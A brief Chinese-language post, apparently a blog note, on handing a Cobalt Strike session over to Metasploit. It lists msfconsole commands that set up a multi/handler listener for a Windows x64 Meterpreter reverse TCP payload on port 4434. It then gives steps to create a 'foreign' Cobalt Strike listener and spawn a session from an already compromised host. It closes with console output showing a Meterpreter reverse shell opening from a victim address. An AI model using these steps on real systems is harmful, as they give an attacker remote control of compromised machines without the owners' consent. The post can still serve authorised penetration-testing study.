gcong 2020-03-06
1、msf创建监听
msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp msf5 exploit(multi/handler) > set lhost 0.0.0.0 lhost => 0.0.0.0 msf5 exploit(multi/handler) > set lport 4434 lport => 4434 msf5 exploit(multi/handler) > set exitonsession false exitonsession => false msf5 exploit(multi/handler) > exploit -j [*] Exploit running as background job 0. [*] Exploit completed, but no session was created.
2、cs创建listeners(类型必须是foreign类型,地址必须是msf的地址,端口是msf监听的端口)
3、在cs现有session上派生会话
4、msf上出现session
msf5 exploit(multi/handler) > [*] Started reverse TCP handler on 0.0.0.0:4434 [*] Sending stage (206403 bytes) to 192.168.3.21 [*] Meterpreter session 1 opened (192.168.0.13:4434 -> 192.168.3.21:61786) at 2020-03-06 10:01:16 +0800